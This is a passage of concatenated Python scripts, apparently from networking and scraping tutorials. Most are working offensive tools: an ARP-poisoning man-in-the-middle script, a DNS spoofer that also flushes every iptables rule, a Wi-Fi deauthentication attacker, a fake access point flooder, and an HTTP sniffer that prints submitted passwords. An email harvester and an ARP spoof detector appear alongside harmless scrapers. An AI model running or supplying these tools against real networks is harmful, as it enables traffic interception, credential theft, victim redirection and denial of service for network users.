    the MAC obtained by actively querying the sender's IP (ARP spoof sign)."""
    # if the packet is an ARP packet
    if packet.haslayer(ARP):
        # if it is an ARP response (ARP reply, op code 2)
        if packet[ARP].op == 2:
            try:
                # get the real MAC address of the sender (active ARP query)
                real_mac = get_mac(packet[ARP].psrc)
                # get the MAC address from the packet sent to us
                response_mac = packet[ARP].hwsrc
                # if they're different, definitely there is an attack
                if real_mac != response_mac:
                    print(f"[!] You are under attack, REAL-MAC: {real_mac.upper()}, FAKE-MAC: {response_mac.upper()}")
            except IndexError:
                # unable to find the real mac
                # may be a fake IP or firewall is blocking packets
                pass
if __name__ == "__main__":
    import sys
    try:
        # interface name may be passed as the first CLI argument
        iface = sys.argv[1]
    except IndexError:
        # otherwise fall back to scapy's default interface
        iface = conf.iface
    # sniff forever, handing each packet to process(); store=False keeps RAM flat
    sniff(store=False, prn=process, iface=iface)
from scapy.all import Ether, ARP, srp, send
import argparse
import time
import os
import sys
def _enable_linux_iproute():
    """
    Enables IP route ( IP Forward ) in linux-based distros by writing "1"
    to /proc/sys/net/ipv4/ip_forward. Requires root. No-op when already on.
    """
    file_path = "/proc/sys/net/ipv4/ip_forward"
    with open(file_path) as f:
        # the proc file yields text such as "1\n"; the original compared it
        # to the integer 1, which is always False, so the early return never
        # fired and the file was rewritten on every call
        if f.read().strip() == "1":
            # already enabled
            return
    with open(file_path, "w") as f:
        print(1, file=f)
def _enable_windows_iproute():
    """
    Enables IP route (IP Forwarding) in Windows by starting the
    RemoteAccess service via the project-local WService wrapper.
    """
    # local import: services/pywin32 only exist on Windows hosts
    from services import WService
    # enable Remote Access service
    service = WService("RemoteAccess")
    service.start()
def enable_ip_route(verbose=True):
    """Turn on kernel IP forwarding, dispatching on the host OS.

    Args:
        verbose: when True, print progress messages.
    """
    if verbose:
        print("[!] Enabling IP Routing...")
    # os.name is "nt" on Windows, "posix" on linux/mac
    if "nt" in os.name:
        _enable_windows_iproute()
    else:
        _enable_linux_iproute()
    if verbose:
        print("[!] IP Routing enabled.")
def get_mac(ip):
    """
    Returns MAC address of any device connected to the network
    If ip is down, returns None instead
    """
    # broadcast ARP who-has; ans holds (sent, received) pairs that answered
    ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=3, verbose=0)
    if ans:
        # MAC of the first responder (falls through to None when no reply)
        return ans[0][1].src
def spoof(target_ip, host_ip, verbose=True):
    """
    Spoofs target_ip saying that we are host_ip.
    it is accomplished by changing the ARP cache of the target (poisoning)
    """
    # get the mac address of the target
    target_mac = get_mac(target_ip)
    # craft the arp 'is-at' operation packet, in other words an ARP response
    # we don't specify 'hwsrc' (source MAC address)
    # because by default, 'hwsrc' is the real MAC address of the sender (ours)
    arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at')
    # send the packet
    # verbose = 0 means that we send the packet without printing any thing
    send(arp_response, verbose=0)
    if verbose:
        # get the MAC address of the default interface we are using
        self_mac = ARP().hwsrc
        print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))
def restore(target_ip, host_ip, verbose=True):
    """
    Restores the normal process of a regular network
    This is done by sending the original informations
    (real IP and MAC of host_ip ) to target_ip
    """
    # get the real MAC address of target
    target_mac = get_mac(target_ip)
    # get the real MAC address of spoofed (gateway, i.e router)
    host_mac = get_mac(host_ip)
    # crafting the restoring packet: this time hwsrc carries the REAL MAC
    arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac)
    # sending the restoring packet
    # to restore the network to its normal process
    # we send each reply seven times for a good measure (count=7)
    send(arp_response, verbose=0, count=7)
    if verbose:
        print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac))
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="ARP spoof script")
    parser.add_argument("target", help="Victim IP Address to ARP poison")
    parser.add_argument("host", help="Host IP Address, the host you wish to intercept packets for (usually the gateway)")
    parser.add_argument("-v", "--verbose", action="store_true", help="verbosity, default is True (simple message each second)")
    args = parser.parse_args()
    target, host, verbose = args.target, args.host, args.verbose
    # forward packets through this machine so the victim keeps connectivity
    enable_ip_route()
    try:
        while True:
            # telling the target that we are the host
            spoof(target, host, verbose)
            # telling the host that we are the target
            spoof(host, target, verbose)
            # sleep for one second between poisoning rounds
            time.sleep(1)
    except KeyboardInterrupt:
        # undo the poisoning in both directions before exiting
        print("[!] Detected CTRL+C ! restoring the network, please wait...")
        restore(target, host)
        restore(host, target)
import win32serviceutil
import time
class WService:
    """Thin wrapper around win32serviceutil to start, stop and restart a
    Windows service, optionally printing progress messages.

    start/stop/restart return True on success, False on failure, and None
    when the requested transition is unnecessary.
    """

    def __init__(self, service, machine=None, verbose=False):
        # service: the Windows service name
        # machine: target host — NOTE(review): never passed to
        #   QueryServiceStatus below, so remote machines are not actually
        #   queried; confirm intent.
        # verbose: print progress messages when True
        self.service = service
        self.machine = machine
        self.verbose = verbose

    # fixed: the original had a bare `property` expression (missing '@'),
    # so `running` stayed a plain method and every `if self.running` check
    # tested the truthiness of a bound method — always True.
    @property
    def running(self):
        # SERVICE_RUNNING == 4 in the service status tuple
        return win32serviceutil.QueryServiceStatus(self.service)[1] == 4

    def start(self):
        """Start the service if it is not already running."""
        if not self.running:
            win32serviceutil.StartService(self.service)
            # give the SCM a moment before re-checking the state
            time.sleep(1)
            if self.running:
                if self.verbose:
                    print(f"[+] {self.service} started successfully.")
                return True
            else:
                if self.verbose:
                    print(f"[-] Cannot start {self.service}")
                return False
        elif self.verbose:
            print(f"[!] {self.service} is already running.")

    def stop(self):
        """Stop the service if it is running."""
        if self.running:
            win32serviceutil.StopService(self.service)
            time.sleep(0.5)
            if not self.running:
                if self.verbose:
                    print(f"[+] {self.service} stopped successfully.")
                return True
            else:
                if self.verbose:
                    print(f"[-] Cannot stop {self.service}")
                return False
        elif self.verbose:
            print(f"[!] {self.service} is not running.")

    def restart(self):
        """Restart the service; a no-op when it is not running."""
        if self.running:
            win32serviceutil.RestartService(self.service)
            time.sleep(2)
            if self.running:
                if self.verbose:
                    print(f"[+] {self.service} restarted successfully.")
                return True
            else:
                if self.verbose:
                    print(f"[-] Cannot start {self.service}")
                return False
        elif self.verbose:
            print(f"[!] {self.service} is not running.")
def main(action, service):
    """Instantiate a verbose WService wrapper for *service* and dispatch
    *action* ('start', 'stop' or 'restart'); unknown actions are ignored."""
    svc = WService(service, verbose=True)
    # dispatch table instead of an if/elif chain
    dispatch = {"start": svc.start, "stop": svc.stop, "restart": svc.restart}
    handler = dispatch.get(action)
    if handler is not None:
        handler()
if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="Windows Service Handler")
    # positional: the Windows service name
    parser.add_argument("service")
    parser.add_argument("-a", "--action", help="action to do, 'start', 'stop' or 'restart'",
                        action="store", required=True, dest="action")
    given_args = parser.parse_args()
    service, action = given_args.service, given_args.action
    main(action, service)
from scapy.all import *
import time
# MACs already reported, so each device is printed only once
hosts = []
# fixed: the original rebound `Ether = 1` here, shadowing scapy's Ether layer
# class (imported via `from scapy.all import *`) and breaking the
# packet.haslayer(Ether)/getlayer(Ether) calls in print_packet; removed.

def listen_dhcp():
    """Sniff DHCP traffic (UDP ports 67/68) forever, handing each packet to
    print_packet."""
    # make sure it is DHCP with the filter options
    sniff(prn=print_packet, filter='udp and (port 67 or port 68)')
def print_packet(packet):
    """Sniffer callback: extract the requester's MAC, hostname, vendor id and
    requested IP from a DHCP packet and print each new device once."""
    target_mac, requested_ip, hostname, vendor_id = [None] * 4
    if packet.haslayer(Ether):
        target_mac = packet.getlayer(Ether).src
    # get the DHCP options (list of (label, value) pairs and bare markers)
    dhcp_options = packet[DHCP].options
    for item in dhcp_options:
        try:
            label, value = item
        except ValueError:
            # bare markers like 'end'/'pad' don't unpack — skip them
            continue
        if label == 'requested_addr':
            requested_ip = value
        elif label == 'hostname':
            hostname = value.decode()
        elif label == 'vendor_class_id':
            vendor_id = value.decode()
    # only report complete records, and each MAC only once
    if target_mac and vendor_id and hostname and requested_ip and target_mac not in hosts:
        hosts.append(target_mac)
        time_now = time.strftime("[%Y-%m-%d - %H:%M:%S] ")
        print("{}: {} - {} / {} requested {}".format(time_now, target_mac, hostname, vendor_id, requested_ip))

if __name__ == "__main__":
    listen_dhcp()
from scapy.all import *
from netfilterqueue import NetfilterQueue
import os
# DNS mapping records, feel free to add/modify this dictionary
# for example, google.com will be redirected to 192.168.1.100
# (keys are bytes with a trailing dot, matching scapy's DNSQR.qname encoding)
dns_hosts = {
    b"www.google.com.": "192.168.1.100",
    b"google.com.": "192.168.1.100",
    b"facebook.com.": "172.217.19.142"
}
def process_packet(packet):
    """
    Whenever a new packet is redirected to the netfilter queue,
    this callback is called. DNS replies are rewritten via modify_packet;
    everything else is accepted untouched.
    """
    # convert netfilter queue packet to scapy packet
    scapy_packet = IP(packet.get_payload())
    if scapy_packet.haslayer(DNSRR):
        # if the packet is a DNS Resource Record (DNS reply)
        # modify the packet
        print("[Before]:", scapy_packet.summary())
        try:
            scapy_packet = modify_packet(scapy_packet)
        except IndexError:
            # not UDP packet, this can be IPerror/UDPerror packets
            pass
        print("[After ]:", scapy_packet.summary())
        # set back as netfilter queue packet
        packet.set_payload(bytes(scapy_packet))
    # accept the packet (forward it on)
    packet.accept()
def modify_packet(packet):
    """
    Modifies the DNS Resource Record packet ( the answer part)
    to map our globally defined dns_hosts dictionary.
    For instance, whenver we see a google.com answer, this function replaces
    the real IP address (172.217.19.142) with fake IP address (192.168.1.100)
    """
    # get the DNS question name, the domain name
    qname = packet[DNSQR].qname
    if qname not in dns_hosts:
        # if the website isn't in our record
        # we don't wanna modify that
        print("no modification:", qname)
        return packet
    # craft new answer, overriding the original
    # setting the rdata for the IP we want to redirect (spoofed)
    # for instance, google.com will be mapped to "192.168.1.100"
    packet[DNS].an = DNSRR(rrname=qname, rdata=dns_hosts[qname])
    # set the answer count to 1 (we replaced the whole answer section)
    packet[DNS].ancount = 1
    # delete checksums and length of packet, because we have modified the packet
    # new calculations are required ( scapy will do automatically )
    del packet[IP].len
    del packet[IP].chksum
    del packet[UDP].len
    del packet[UDP].chksum
    # return the modified packet
    return packet
if __name__ == "__main__":
    QUEUE_NUM = 0
    # insert the iptables FORWARD rule so forwarded packets land in our queue
    os.system("iptables -I FORWARD -j NFQUEUE --queue-num {}".format(QUEUE_NUM))
    # instantiate the netfilter queue
    queue = NetfilterQueue()
    try:
        # bind the queue number to our callback process_packet
        # and start it (blocks until interrupted)
        queue.bind(QUEUE_NUM, process_packet)
        queue.run()
    except KeyboardInterrupt:
        # if want to exit, make sure we
        # remove that rule we just inserted, going back to normal.
        # NOTE(review): --flush removes ALL iptables rules, not just ours.
        os.system("iptables --flush")
from scapy.all import *
from threading import Thread
from faker import Faker
def send_beacon(ssid, mac, infinite=True):
    """Broadcast 802.11 beacon frames advertising a fake access point named
    *ssid* with BSSID *mac* on the module-level interface ``iface``.

    When infinite is True, keeps sending a frame every 100 ms forever.
    """
    dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=mac, addr3=mac)
    # type=0: management frame
    # subtype=8: beacon frame
    # addr1: MAC address of the receiver (broadcast)
    # addr2: MAC address of the sender
    # addr3: MAC address of the Access Point (AP)
    # beacon frame
    beacon = Dot11Beacon()
    # we inject the ssid name
    essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
    # stack all the layers and add a RadioTap
    frame = RadioTap()/dot11/beacon/essid
    # send the frame
    if infinite:
        sendp(frame, inter=0.1, loop=1, iface=iface, verbose=0)
    else:
        sendp(frame, iface=iface, verbose=0)
if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="Fake Access Point Generator")
    parser.add_argument("interface", default="wlan0mon",
                        help="The interface to send beacon frames with, must be in monitor mode")
    # fixed: argparse yields strings, so range(n_ap) crashed with TypeError;
    # parse the count as int and give it a sane default instead of None
    parser.add_argument("-n", "--access-points", dest="n_ap", type=int, default=5,
                        help="Number of access points to be generated")
    args = parser.parse_args()
    n_ap = args.n_ap
    iface = args.interface
    # generate random SSIDs and MACs
    faker = Faker()
    ssids_macs = [(faker.name(), faker.mac_address()) for i in range(n_ap)]
    # one sender thread per fake access point
    for ssid, mac in ssids_macs:
        Thread(target=send_beacon, args=(ssid, mac)).start()
from scapy.all import *
from scapy.layers.http import HTTPRequest # import HTTP packet
from colorama import init, Fore
# initialize colorama
init()
# define colors
GREEN = Fore.GREEN
RED = Fore.RED
RESET = Fore.RESET
def sniff_packets(iface=None):
    """
    Sniff 80 port packets with iface, if None (default), then the
    scapy's default interface is used
    """
    # build the sniff arguments once, adding iface only when one was given
    kwargs = {"filter": "port 80", "prn": process_packet, "store": False}
    if iface:
        kwargs["iface"] = iface
    sniff(**kwargs)
def process_packet(packet):
    """
    This function is executed whenever a packet is sniffed.
    Prints the source IP, requested URL and HTTP method; optionally dumps
    raw POST payloads when the module-level show_raw flag is set.
    """
    if packet.haslayer(HTTPRequest):
        # if this packet is an HTTP Request
        # get the requested URL (Host header + path)
        url = packet[HTTPRequest].Host.decode() + packet[HTTPRequest].Path.decode()
        # get the requester's IP Address
        ip = packet[IP].src
        # get the request method
        method = packet[HTTPRequest].Method.decode()
        print(f"\n{GREEN}[+] {ip} Requested {url} with {method}{RESET}")
        if show_raw and packet.haslayer(Raw) and method == "POST":
            # if show_raw flag is enabled, has raw data, and the requested method is "POST"
            # then show raw (may contain passwords, form fields, etc.)
            print(f"\n{RED}[*] Some useful Raw data: {packet[Raw].load}{RESET}")
if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="HTTP Packet Sniffer, this is useful when you're a man in the middle." \
                                     + "It is suggested that you run arp spoof before you use this script, otherwise it'll sniff your personal packets")
    parser.add_argument("-i", "--iface", help="Interface to use, default is scapy's default interface")
    parser.add_argument("--show-raw", dest="show_raw", action="store_true", help="Whether to print POST raw data, such as passwords, search queries, etc.")
    # parse arguments
    args = parser.parse_args()
    iface = args.iface
    # read by process_packet as a module-level flag
    show_raw = args.show_raw
    sniff_packets(iface)
from scapy.all import *
def deauth(target_mac, gateway_mac, inter=0.1, count=None, loop=1, iface="wlan0mon", verbose=1):
    """Send 802.11 deauthentication frames to target_mac, forged as coming
    from gateway_mac, every *inter* seconds. count=None with loop=1 sends
    forever; otherwise sends *count* frames."""
    # 802.11 frame
    # addr1: destination MAC
    # addr2: source MAC
    # addr3: Access Point MAC
    dot11 = Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac)
    # stack them up; reason=7 is "Class 3 frame received from nonassociated STA"
    packet = RadioTap()/dot11/Dot11Deauth(reason=7)
    # send the packet
    sendp(packet, inter=inter, count=count, loop=loop, iface=iface, verbose=verbose)
if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="A python script for sending deauthentication frames")
    parser.add_argument("target", help="Target MAC address to deauthenticate.")
    parser.add_argument("gateway", help="Gateway MAC address that target is authenticated with")
    parser.add_argument("-c" , "--count", help="number of deauthentication frames to send, specify 0 to keep sending infinitely, default is 0", default=0)
    parser.add_argument("--interval", help="The sending frequency between two frames sent, default is 100ms", default=0.1)
    parser.add_argument("-i", dest="iface", help="Interface to use, must be in monitor mode, default is 'wlan0mon'", default="wlan0mon")
    parser.add_argument("-v", "--verbose", help="wether to print messages", action="store_true")
    args = parser.parse_args()
    target = args.target
    gateway = args.gateway
    # argparse yields strings — convert explicitly
    count = int(args.count)
    interval = float(args.interval)
    iface = args.iface
    verbose = args.verbose
    if count == 0:
        # if count is 0, it means we loop forever (until interrupt):
        # sendp interprets count=None + loop=1 as infinite
        loop = 1
        count = None
    else:
        loop = 0
    # printing some info messages
    if verbose:
        if count:
            print(f"[+] Sending {count} frames every {interval}s...")
        else:
            print(f"[+] Sending frames every {interval}s for ever...")
    deauth(target, gateway, interval, count, loop, iface, verbose)
from scapy.all import ARP, Ether, srp
# --- discover live devices on the LAN via a broadcast ARP sweep ---
# CIDR range to scan
target_ip = "192.168.1.1/24"
# IP Address for the destination
# create ARP packet
arp = ARP(pdst=target_ip)
# create the Ether broadcast packet
# ff:ff:ff:ff:ff:ff MAC address indicates broadcasting
ether = Ether(dst="ff:ff:ff:ff:ff:ff")
# stack them
packet = ether/arp
# srp returns (answered, unanswered); keep only the answered pairs
result = srp(packet, timeout=3, verbose=0)[0]
# a list of clients, we will fill this in the upcoming loop
clients = []
for sent, received in result:
    # for each response, append ip and mac address to clients list
    clients.append({'ip': received.psrc, 'mac': received.hwsrc})
# print clients
print("Available devices in the network:")
print("IP" + " "*18+"MAC")
for client in clients:
    print("{:16} {}".format(client['ip'], client['mac']))
from scapy.all import *
from threading import Thread
import pandas
import time
import os
import sys
# initialize the networks dataframe that will contain all access points nearby
# (shared between the sniffer callback and the printer thread)
networks = pandas.DataFrame(columns=["BSSID", "SSID", "dBm_Signal", "Channel", "Crypto"])
# set the index BSSID (MAC address of the AP) so each AP appears once
networks.set_index("BSSID", inplace=True)
def callback(packet):
    """Sniffer callback: record each beacon frame's AP details (SSID, signal,
    channel, crypto) into the shared `networks` dataframe, keyed by BSSID."""
    if packet.haslayer(Dot11Beacon):
        # extract the MAC address of the network
        bssid = packet[Dot11].addr2
        # get the name of it
        ssid = packet[Dot11Elt].info.decode()
        try:
            dbm_signal = packet.dBm_AntSignal
        except:
            # some drivers don't report signal strength
            dbm_signal = "N/A"
        # extract network stats
        stats = packet[Dot11Beacon].network_stats()
        # get the channel of the AP
        channel = stats.get("channel")
        # get the crypto
        crypto = stats.get("crypto")
        # upsert the row for this BSSID
        networks.loc[bssid] = (ssid, dbm_signal, channel, crypto)
def print_all():
    """Daemon-thread loop: clear the terminal and redraw the networks table
    twice per second."""
    while True:
        os.system("clear")
        print(networks)
        time.sleep(0.5)

def change_channel():
    """Daemon-thread loop: hop the interface across Wi-Fi channels 1-14
    every 0.5s so beacons on every channel get sniffed."""
    ch = 1
    while True:
        os.system(f"iwconfig {interface} channel {ch}")
        # switch channel from 1 to 14 each 0.5s
        ch = ch % 14 + 1
        time.sleep(0.5)
if __name__ == "__main__":
    # interface name, check using iwconfig (must be in monitor mode)
    interface = sys.argv[1]
    # start the thread that prints all the networks
    printer = Thread(target=print_all)
    printer.daemon = True
    printer.start()
    # start the channel changer
    channel_changer = Thread(target=change_channel)
    channel_changer.daemon = True
    channel_changer.start()
    # start sniffing (blocks; daemon threads die when this is interrupted)
    sniff(prn=callback, iface=interface)
import requests
import os
from tqdm import tqdm
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin, urlparse
def is_valid(url):
    """
    Checks whether url is a valid URL, i.e. it parses with both a scheme
    (http/https/...) and a network location (host).
    """
    pieces = urlparse(url)
    # relative paths have no netloc; bare hosts without '://' have no scheme
    if not pieces.scheme:
        return False
    return bool(pieces.netloc)
def get_all_images(url):
    """
    Returns all image URLs on a single url: fetches the page, extracts every
    <img src>, absolutizes it against the page URL, strips query strings and
    keeps only well-formed absolute URLs.
    """
    soup = bs(requests.get(url).content, "html.parser")
    urls = []
    for img in tqdm(soup.find_all("img"), "Extracting images"):
        img_url = img.attrs.get("src")
        if not img_url:
            # if img does not contain src attribute, just skip
            continue
        # make the URL absolute by joining domain with the URL that is just extracted
        img_url = urljoin(url, img_url)
        # remove URLs like '/hsts-pixel.gif?c=3.2.5' (drop the query string)
        try:
            pos = img_url.index("?")
            img_url = img_url[:pos]
        except ValueError:
            # no query string present
            pass
        # finally, if the url is valid
        if is_valid(img_url):
            urls.append(img_url)
    return urls
def download(url, pathname):
    """
    Downloads a file given an URL and puts it in the folder pathname,
    streaming it in 1 KiB chunks with a tqdm progress bar.
    """
    # if path doesn't exist, make that path dir
    if not os.path.isdir(pathname):
        os.makedirs(pathname)
    # download the body of response by chunk, not immediately
    response = requests.get(url, stream=True)
    # get the total file size (0 when the server omits Content-Length)
    file_size = int(response.headers.get("Content-Length", 0))
    # get the file name
    filename = os.path.join(pathname, url.split("/")[-1])
    # progress bar, changing the unit to bytes instead of iteration (default by tqdm)
    # (fixed: the bar description previously interpolated a literal
    # placeholder instead of the filename)
    progress = tqdm(response.iter_content(1024), f"Downloading {filename}", total=file_size, unit="B", unit_scale=True, unit_divisor=1024)
    with open(filename, "wb") as f:
        for data in progress:
            # write data read to the file
            f.write(data)
            # update the progress bar manually
            progress.update(len(data))
def main(url, path):
    """Fetch every image found on the page at `url` and save it under `path`."""
    for image_url in get_all_images(url):
        download(image_url, path)
if __name__ == "__main__":
    # CLI entry point: python script.py URL [-p PATH]
    import argparse
    parser = argparse.ArgumentParser(description="This script downloads all images from a web page")
    parser.add_argument("url", help="The URL of the web page you want to download images")
    parser.add_argument("-p", "--path", help="The Directory you want to store your images, default is the domain of URL passed")
    args = parser.parse_args()
    url = args.url
    path = args.path
    if not path:
        # if path isn't specified, use the domain name of that url as the folder name
        path = urlparse(url).netloc
    main(url, path)
from requests_html import HTMLSession
import requests
from tqdm import tqdm
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin, urlparse
import os
def is_valid(url):
    """Return True when `url` parses with both a scheme and a netloc."""
    result = urlparse(url)
    if not result.scheme:
        return False
    return bool(result.netloc)
def get_all_images(url):
    """
    Returns all image URLs on a single url.

    Unlike the plain-requests variant, this one executes the page's
    JavaScript first, so dynamically inserted images are also found.
    """
    # initialize the session
    session = HTMLSession()
    # make the HTTP request and retrieve response
    response = session.get(url)
    # execute Javascript
    # NOTE(review): render() needs a headless browser backend installed — confirm.
    response.html.render()
    # construct the soup parser
    soup = bs(response.html.html, "html.parser")
    urls = []
    for img in tqdm(soup.find_all("img"), "Extracting images"):
        # lazy-loaded images often keep the real URL in data-src
        img_url = img.attrs.get("src") or img.attrs.get("data-src")
        if not img_url:
            # if img does not contain src attribute, just skip
            continue
        # make the URL absolute by joining domain with the URL that is just extracted
        img_url = urljoin(url, img_url)
        # remove URLs like '/hsts-pixel.gif?c=3.2.5'
        try:
            pos = img_url.index("?")
            img_url = img_url[:pos]
        except ValueError:
            pass
        # finally, if the url is valid
        if is_valid(img_url):
            urls.append(img_url)
    return urls
def download(url, pathname):
    """
    Download the file at `url` into the directory `pathname`.

    Creates `pathname` if needed; the local file name is the last path
    component of the URL. Progress is reported in bytes.
    """
    # if path doesn't exist, make that path dir
    if not os.path.isdir(pathname):
        os.makedirs(pathname)
    # stream the body by chunk, not all at once
    response = requests.get(url, stream=True)
    # total size in bytes (0 when the server sent no Content-Length)
    file_size = int(response.headers.get("Content-Length", 0))
    filename = os.path.join(pathname, url.split("/")[-1])
    # BUG FIX: wrapping the chunk iterator in tqdm auto-advances the bar by 1
    # per chunk, and the manual update(len(data)) advanced it again, so
    # progress was double-counted. Use a manual-only bar. (Also restored the
    # file name in the description, garbled to "(unknown)" in the original.)
    progress = tqdm(None, f"Downloading {filename}", total=file_size, unit="B", unit_scale=True, unit_divisor=1024)
    with open(filename, "wb") as f:
        for data in response.iter_content(1024):
            # write data read to the file
            f.write(data)
            # advance by bytes actually received
            progress.update(len(data))
    progress.close()
def main(url, path):
    """Download all images found on the page at `url` into the folder `path`."""
    image_urls = get_all_images(url)
    for image_url in image_urls:
        download(image_url, path)
if __name__ == "__main__":
    # CLI entry point: python script.py URL [-p PATH]
    import argparse
    parser = argparse.ArgumentParser(description="This script downloads all images from a web page")
    parser.add_argument("url", help="The URL of the web page you want to download images")
    parser.add_argument("-p", "--path", help="The Directory you want to store your images, default is the domain of URL passed")
    args = parser.parse_args()
    url = args.url
    path = args.path
    if not path:
        # if path isn't specified, use the domain name of that url as the folder name
        path = urlparse(url).netloc
    main(url, path)
import re
from requests_html import HTMLSession
import sys
# usage: python script.py URL OUTPUT_FILE
url = sys.argv[1]
# RFC-5322-style address pattern.
# NOTE(review): this pattern appears to lack the '@' separator between the
# local part and the domain — verify against the original source.
EMAIL_REGEX = r"""(?:[a-z0-9!#%&'*+/=?^_{|}-]+(?:\.[a-z0-9!#%&'*+/=?^_{|}-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*")(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])"""
# initiate an HTTP session
session = HTMLSession()
# get the HTTP Response
r = session.get(url)
# for JavaScript-driven websites: execute scripts before scanning the HTML
r.html.render()
# append every match to the output file, one address per line
with open(sys.argv[2], "a") as f:
    for re_match in re.finditer(EMAIL_REGEX, r.html.raw_html.decode()):
        print(re_match.group().strip(), file=f)
from bs4 import BeautifulSoup
from requests_html import HTMLSession
from pprint import pprint
# initialize an HTTP session
# module-level session shared by get_all_forms() and by importers of this module
session = HTMLSession()
def get_all_forms(url):
    """Returns all form tags found on a web page's url """
    # GET request (uses the module-level session)
    res = session.get(url)
    # for javascript driven website
    # res.html.render()
    soup = BeautifulSoup(res.html.html, "html.parser")
    return soup.find_all("form")
def get_form_details(form):
    """Returns the HTML details of a form,
    including action, method and list of form controls (inputs, etc).

    `form` is a BeautifulSoup <form> tag. The result is a dict with keys
    'action' (str), 'method' (str, lowercase) and 'inputs' (list of dicts
    with 'type', 'name', 'value').
    """
    details = {}
    # get the form action (requested URL)
    # BUG FIX: a form may omit the action attribute (the browser then submits
    # to the current page); the original called .lower() on None and crashed.
    action = (form.attrs.get("action") or "").lower()
    # get the form method (POST, GET, DELETE, etc)
    # if not specified, GET is the default in HTML
    method = form.attrs.get("method", "get").lower()
    # get all form inputs
    inputs = []
    for input_tag in form.find_all("input"):
        # get type of input form control (text is the HTML default)
        input_type = input_tag.attrs.get("type", "text")
        # get name attribute
        input_name = input_tag.attrs.get("name")
        # get the default value of that input tag
        input_value = input_tag.attrs.get("value", "")
        # add everything to that list
        inputs.append({"type": input_type, "name": input_name, "value": input_value})
    # put everything to the resulting dictionary
    details["action"] = action
    details["method"] = method
    details["inputs"] = inputs
    return details
if __name__ == "__main__":
    # CLI entry point: python script.py URL — pretty-print all forms on the page
    import sys
    # get URL from the command line
    url = sys.argv[1]
    # get all form tags
    forms = get_all_forms(url)
    # iterate over forms
    for i, form in enumerate(forms, start=1):
        form_details = get_form_details(form)
        print("="*50, f"form #{i}", "="*50)
        pprint(form_details)
from bs4 import BeautifulSoup
from requests_html import HTMLSession
from pprint import pprint
from urllib.parse import urljoin
import webbrowser
import sys
from form_extractor import get_all_forms, get_form_details, session
# get the URL from the command line
url = sys.argv[1]
# get the first form (edit this as you wish)
first_form = get_all_forms(url)[0]
# extract all form details
form_details = get_form_details(first_form)
pprint(form_details)
# the data body we want to submit
data = {}
for input_tag in form_details["inputs"]:
    if input_tag["type"] == "hidden":
        # if it's hidden, use the default value
        data[input_tag["name"]] = input_tag["value"]
    elif input_tag["type"] != "submit":
        # all others except submit, prompt the user to set it
        value = input(f"Enter the value of the field '{input_tag['name']}' (type: {input_tag['type']}): ")
        data[input_tag["name"]] = value
# join the url with the action (form request URL)
url = urljoin(url, form_details["action"])
# NOTE(review): `res` is unbound if the form method is neither post nor get —
# the code below would raise NameError in that case; confirm this is acceptable.
if form_details["method"] == "post":
    res = session.post(url, data=data)
elif form_details["method"] == "get":
    res = session.get(url, params=data)
# the below code is only for replacing relative URLs to absolute ones
# NOTE(review): the bare `except: pass` blocks swallow all errors for tags
# missing href/src attributes — deliberate best-effort rewriting.
soup = BeautifulSoup(res.content, "html.parser")
for link in soup.find_all("link"):
    try:
        link.attrs["href"] = urljoin(url, link.attrs["href"])
    except:
        pass
for script in soup.find_all("script"):
    try:
        script.attrs["src"] = urljoin(url, script.attrs["src"])
    except:
        pass
for img in soup.find_all("img"):
    try:
        img.attrs["src"] = urljoin(url, img.attrs["src"])
    except:
        pass
for a in soup.find_all("a"):
    try:
        a.attrs["href"] = urljoin(url, a.attrs["href"])
    except:
        pass
# write the page content to a file
open("page.html", "w").write(str(soup))
# open the page on the default browser
webbrowser.open("page.html")
import requests
import pandas as pd
from bs4 import BeautifulSoup as bs
# desktop-browser User-Agent so the target site serves the normal page
USER_AGENT = "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
# US english
# NOTE(review): this looks like a mangled "en-US,en;q=0.5" — verify against original.
LANGUAGE = "en-US,enq=0.5"
def get_soup(url):
    """Constructs and returns a soup using the HTML content of url passed"""
    session = requests.Session()
    # spoof a desktop browser and request English content
    session.headers['User-Agent'] = USER_AGENT
    session.headers['Accept-Language'] = LANGUAGE
    session.headers['Content-Language'] = LANGUAGE
    response = session.get(url)
    # parse the raw body into a soup
    return bs(response.content, "html.parser")
def get_all_tables(soup):
    """Return every <table> tag found in the parsed document `soup`."""
    return soup.find_all("table")
def get_table_headers(table):
    """Given a table soup, returns all the headers"""
    # header cells are the <th> tags of the first row
    first_row = table.find("tr")
    return [th.text.strip() for th in first_row.find_all("th")]
def get_table_rows(table):
    """Given a table, returns all its rows (as lists of stripped cell text)."""
    rows = []
    # skip the first <tr>, which holds the headers
    for tr in table.find_all("tr")[1:]:
        tds = tr.find_all("td")
        # some tables (e.g. Wikipedia) use <th> for row-leading cells;
        # fall back to those when the row has no <td> tags at all
        source_cells = tds if tds else tr.find_all("th")
        rows.append([cell.text.strip() for cell in source_cells])
    return rows
